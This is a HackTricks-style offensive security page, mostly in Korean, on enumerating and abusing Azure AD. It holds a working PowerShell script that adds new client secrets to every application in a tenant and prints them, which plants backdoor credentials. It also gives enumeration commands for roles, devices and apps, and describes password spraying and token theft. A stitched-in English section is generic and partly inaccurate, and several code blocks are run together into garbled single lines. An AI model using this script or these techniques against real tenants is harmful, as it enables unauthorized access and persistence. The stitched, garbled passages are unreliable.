HackTricks를 지원하는 다른 방법:

• 회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!

• 공식 PEASS & HackTricks 스웨그를 얻으세요.

• The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.

• 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.

• Hacking 트릭을 공유하려면 HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하세요.

```powershell # Just call Add-AzADAppSecret Function Add-AzADAppSecret { <# .SYNOPSIS Add client secret to the applications.

.PARAMETER GraphToken Pass the Graph API Token

.EXAMPLE PS C:> Add-AzADAppSecret -GraphToken 'eyJ0eX..'

.LINK https://docs.microsoft.com/en-us/graph/api/application-list?view=graph-rest-1.0&tabs=http https://docs.microsoft.com/en-us/graph/api/application-addpassword?view=graph-rest-1.0&tabs=http #>

[CmdletBinding()] param( [Parameter(Mandatory=$True)] [String] $GraphToken = $null )

$AppList = $null $AppPassword = $null

List All the Applications

$Params = @{ "URI" = "https://graph.microsoft.com/v1.0/applications" "Method" = "GET" "Headers" = @{ "Content-Type" = "application/json" "Authorization" = "Bearer $GraphToken" } }

try { $AppList = Invoke-RestMethod @Params -UseBasicParsing } catch { }

Add Password in the Application

if($AppList -ne $null) { [System.Collections.ArrayList]$Details = @()

foreach($App in $AppList.value) { $ID = $App.ID $psobj = New-Object PSObject

$Params = @{ "URI" = "https://graph.microsoft.com/v1.0/applications/$ID/addPassword" "Method" = "POST" "Headers" = @{ "Content-Type" = "application/json" "Authorization" = "Bearer $GraphToken" } }

$Body = @{ "passwordCredential"= @{ "displayName" = "Password" } }

try { $AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json) Add-Member -InputObject $psobj -NotePropertyName "Object ID" -NotePropertyValue $ID Add-Member -InputObject $psobj -NotePropertyName "App ID" -NotePropertyValue $App.appId Add-Member -InputObject $psobj -NotePropertyName "App Name" -NotePropertyValue $App.displayName Add-Member -InputObject $psobj -NotePropertyName "Key ID" -NotePropertyValue $AppPassword.keyId Add-Member -InputObject $psobj -NotePropertyName "Secret" -NotePropertyValue $AppPassword.secretText $Details.Add($psobj) | Out-Null } catch { Write-Output "Failed to add new client secret to '$($App.displayName)' Application." } } if($Details -ne $null) { Write-Output "" Write-Output "Client secret added to : " Write-Output $Details | fl * } } else { Write-Output "Failed to Enumerate the Applications." } }

</details>

### 역할

<div data-gb-custom-block data-tag="tabs">

<div data-gb-custom-block data-tag="tab" data-title='az cli'>

```bash
# Get roles
az role definition list
# Get assigned roles
az role assignment list --all --query "[].roleDefinitionName"
az role assignment list --all | jq '.[] | .roleDefinitionName,.scope'
# Get info of 1 role
az role definition list --name "AzureML Registry User"
# Get only custom roles
az role definition list --custom-role-only
# Get only roles assigned to the resource group indicated
az role definition list --resource-group <resource_group>
# Get only roles assigned to the indicated scope
az role definition list --scope <scope>
# Get all the principals a role is assigned to
az role assignment list --all --query "[].{principalName:principalName,principalType:principalType,resourceGroup:resourceGroup,roleDefinitionName:roleDefinitionName}[?roleDefinitionName=='<ROLE_NAME>']"

Azure AD

# Get all available role templates
Get-AzureADDirectoryroleTemplate
# Get enabled roles (Assigned roles)
Get-AzureADDirectoryRole
Get-AzureADDirectoryRole -ObjectId <roleID> #Get info about the role
# Get custom roles - use AzureAdPreview
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
# Users assigned a role (Global Administrator)
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
Get-AzureADDirectoryRole -ObjectId <id> | fl
# Roles of the Administrative Unit (who has permissions over the administrative unit and its members)
Get-AzureADMSScopedRoleMembership -Id <id> | fl *

Az PowerShell

# Get role assignments on the subscription
Get-AzRoleDefinition
# Get Role definition
Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
# Get roles of a user or resource
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<res_group_name>/providers/Microsoft.Compute/virtualMachines/<vm_name>

Azure AD

Enumeration

User Enumeration

To enumerate users in Azure AD, you can use the following methods:

1. Azure AD Graph API

You can use the Azure AD Graph API to retrieve information about users in Azure AD. The API provides various endpoints to query user data.

To enumerate users using the Azure AD Graph API, you can send a GET request to the following endpoint:

https://graph.windows.net/{tenant_id}/users?api-version=1.6

Replace {tenant_id} with the ID of the Azure AD tenant you want to enumerate users from.

2. Microsoft Graph API

The Microsoft Graph API is the recommended API for accessing Azure AD resources, including user data. It provides a unified endpoint to access various Microsoft cloud services, including Azure AD.

To enumerate users using the Microsoft Graph API, you can send a GET request to the following endpoint:

https://graph.microsoft.com/v1.0/users

This will retrieve a list of users in the default Azure AD tenant.

Group Enumeration

To enumerate groups in Azure AD, you can use the following methods:

1. Azure AD Graph API

You can use the Azure AD Graph API to retrieve information about groups in Azure AD. The API provides various endpoints to query group data.

To enumerate groups using the Azure AD Graph API, you can send a GET request to the following endpoint:

https://graph.windows.net/{tenant_id}/groups?api-version=1.6

Replace {tenant_id} with the ID of the Azure AD tenant you want to enumerate groups from.

2. Microsoft Graph API

To enumerate groups using the Microsoft Graph API, you can send a GET request to the following endpoint:

https://graph.microsoft.com/v1.0/groups

This will retrieve a list of groups in the default Azure AD tenant.

Exploitation

Password Spraying

Password spraying is a technique used to bypass account lockout policies by attempting a small number of passwords against a large number of accounts. This technique is effective against weak passwords and can be used to gain unauthorized access to user accounts.

To perform password spraying against Azure AD, you can use the following tools:

• Spray

• AzureSpray

These tools automate the process of password spraying by allowing you to specify a list of usernames and a list of passwords to try against those usernames.

Password Hash Cracking

If you have obtained password hashes from Azure AD, you can attempt to crack them using password cracking tools such as:

• Hashcat

• John the Ripper

These tools support various hash formats and can be used to crack password hashes obtained from Azure AD.

Token Impersonation

Token impersonation is a technique used to impersonate a user by stealing their access token. In Azure AD, access tokens are used to authenticate and authorize requests to various resources.

To perform token impersonation in Azure AD, you can use the following tools:

• Rubeus

• Impacket

These tools allow you to steal access tokens and use them to perform actions on behalf of the impersonated user.

Privilege Escalation

To escalate privileges in Azure AD, you can exploit misconfigurations or vulnerabilities in Azure AD or associated services.

Some common privilege escalation techniques in Azure AD include:

• Exploiting misconfigured permissions on Azure AD applications

• Exploiting vulnerabilities in Azure AD Connect

• Exploiting misconfigured role assignments in Azure RBAC

References

• Azure AD Graph API documentation

• Microsoft Graph API documentation

# Get permissions over a resource using ARM directly
$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

장치

# If you know how to do this send a PR!Azure AD# Enumerate DevicesGet-AzureADDevice -All $true | fl *# List all the active devices (and not the stale devices)Get-AzureADDevice -All $true | ?{$_.ApproximateLastLogonTimeStamp -ne $null}# Get owners of all devicesGet-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwnerGet-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredOwner -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}# Registred users of all the devicesGet-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUserGet-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredUser -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}# Get dives managed using IntuneGet-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}# Get devices owned by a userGet-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com# Get Administrative Units of a deviceGet-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -ObjectId $_.ObjectId | where {$_.ObjectId -eq $deviceObjId} }

장치(VM)가 AzureAD에 가입되어 있으면 AzureAD 사용자가 로그인할 수 있습니다. 또한, 로그인한 사용자가 장치의 소유자인 경우 로컬 관리자가 됩니다.

애플리케이션

앱은 포털의 앱 등록입니다(Enterprise Applications이 아닙니다). 그러나 각 앱 등록은 동일한 이름의 Enterprise Application(서비스 주체)을 생성합니다. 또한, 앱이 멀티 테넌트 앱인 경우 다른 테넌트에 동일한 이름의 Enterprise App(서비스 주체)가 생성됩니다.

앱이 생성되면 2 종류의 권한이 부여됩니다:

• 서비스 주체에게 부여된 권한

• 사용자를 대신하여 앱이 가질 수 있는 권한

# List Appsaz ad app listaz ad app list --query "[].[displayName]" -o table# Get info of 1 Appaz ad app show --id 00000000-0000-0000-0000-000000000000# Search App by stringaz ad app list --query "[?contains(displayName,'app')].displayName"# Get the owner of an applicationaz ad app owner list --id <id> --query "[].[displayName]" -o table# List all the apps with an application passwordaz ad app list --query "[?passwordCredentials != null].displayName"# List apps that have key credentials (use of certificate authentication)az ad app list --query "[?keyCredentials != null].displayName"Azure AD# List all registered applicationsGet-AzureADApplication -All $true# Get details of an applicationGet-AzureADApplication -ObjectId <id> | fl *# List all the apps with an application passwordGet-AzureADApplication -All $true | %{if(Get-AzureADApplicationPasswordCredential -ObjectID $_.ObjectID){$_}}# Get owner of an applicationGet-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *Az PowerShell# Get AppsGet-AzADApplication# Get details of one AppGet-AzADApplication -ObjectId <id># Get App searching by stringGet-AzADApplication | ?{$_.DisplayName -match "app"}# Get Apps with passwordGet-AzADAppCredential

AppRoleAssignment.ReadWrite 권한을 가진 앱은 역할을 부여함으로써 Global Admin으로 승격할 수 있습니다. 자세한 내용은 여기를 확인하세요.

애플리케이션이 토큰을 요청할 때 신원을 증명하는 데 사용하는 비밀 문자열은 애플리케이션 비밀번호입니다. 따라서, 이 비밀번호를 찾으면 테넌트 내의 서비스 주체로 액세스할 수 있습니다. 이 비밀번호는 생성될 때만 표시됩니다(변경할 수는 있지만 다시 얻을 수는 없습니다). 애플리케이션의 소유자는 이에 비밀번호를 추가할 수 있습니다(따라서 그를 위장할 수 있습니다). 이러한 서비스 주체로의 로그인은 위험으로 표시되지 않으며 MFA가 없습니다.

애플리케이션 및 (엔터프라이즈 애플리케이션 또는 서비스 주체)의 차이점

Azure에서 애플리케이션과 서비스 주체(Service Principal)의 차이점:

• 애플리케이션/앱 등록: Azure AD에 존재하는 애플리케이션입니다.

• (Get-AzureADApplication -filter "DisplayName eq 'testapp'")

• 서비스 주체/엔터프라이즈 애플리케이션: Azure AD에서의 보안 개체로, Azure Directory에서 권한을 가질 수 있으며 애플리케이션 또는 제3자 애플리케이션과 연결됩니다.

• (Get-AzureADServicePrincipal -filter "DisplayName eq 'testapp'")

• 매우 민감한 권한인 경우 관리자는 주어진 권한을 승인해야 할 수 있습니다.

애플리케이션은 제3자 테넌트에서 실행될 수 있으며, 사용을 시작하고 액세스 권한을 부여하면 엔터프라이즈 애플리케이션/서비스 주체가 테넌트에 생성되어 필요한 정보에 액세스할 수 있습니다.

관리 단위

사용자 관리를 위해 사용됩니다.

관리 단위는 역할의 권한을 조직의 일부에 제한합니다. 예를 들어, 관리 단위를 사용하여 Helpdesk Administrator 역할을 지역 지원 전문가에게 위임하여 해당 지역의 사용자만 관리할 수 있습니다.

따라서, 관리 단위에 역할을 할당할 수 있으며, 해당 멤버는 이러한 역할을 가집니다.

AzureAD

```powershell # Get Administrative Units Get-AzureADMSAdministrativeUnit Get-AzureADMSAdministrativeUnit -Id # Get ID of admin unit by string $adminUnitObj = Get-AzureADMSAdministrativeUnit -Filter "displayname eq 'Test administrative unit 2'" # List the users, groups, and devices affected by the administrative unit Get-AzureADMSAdministrativeUnitMember -Id # Get the roles users have over the members of the AU Get-AzureADMSScopedRoleMembership -Id | fl #Get role ID and role members ``` ## Azure AD Identity Protection (AIP)

Azure AD Identity Protection (AIP)은 Azure Active Directory의 사용자 ID가 침해되는 것을 방지하기 위해 자동 탐지 및 복구를 사용하는 보안 서비스입니다. AIP는 사용자 로그인 및 ID 구성의 위험을 지속적으로 모니터링하고 평가하여 적절한 보안 조치를 자동으로 적용합니다. 이는 조직이 ID 기반 보안 위반을 방지하는 데 도움이 됩니다.

흐름:

1. Azure AD Identity Protection은 사용자 활동을 모니터링하고 사용자 로그인, 인증 이벤트 및 기타 관련 활동에 대한 데이터를 수집합니다.

2. 이 서비스는 머신 러닝 알고리즘을 사용하여 이 데이터를 분석하고 잠재적인 보안 위협을 감지합니다.

3. Azure AD Identity Protection은 위협에 대한 위험 수준을 할당하고 필요한 경우 자동 조치를 수행하기 위해 경고를 생성합니다.

Azure AD Password Protection (APP)

Azure AD Password Protection (APP)은 Azure Active Directory에서 강력한 암호 정책을 강제로 적용하여 약한 암호를 방지하는 보안 기능입니다. APP은 일반적으로 사용되는 약한 암호 및 그 변형을 차단하여 암호 관련 위반의 위험을 줄입니다. 이는 클라우드 수준 및 온프레미스 Active Directory에서 모두 적용될 수 있으며 조직 전체의 암호 보안을 향상시킵니다.

참고 자료

• https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units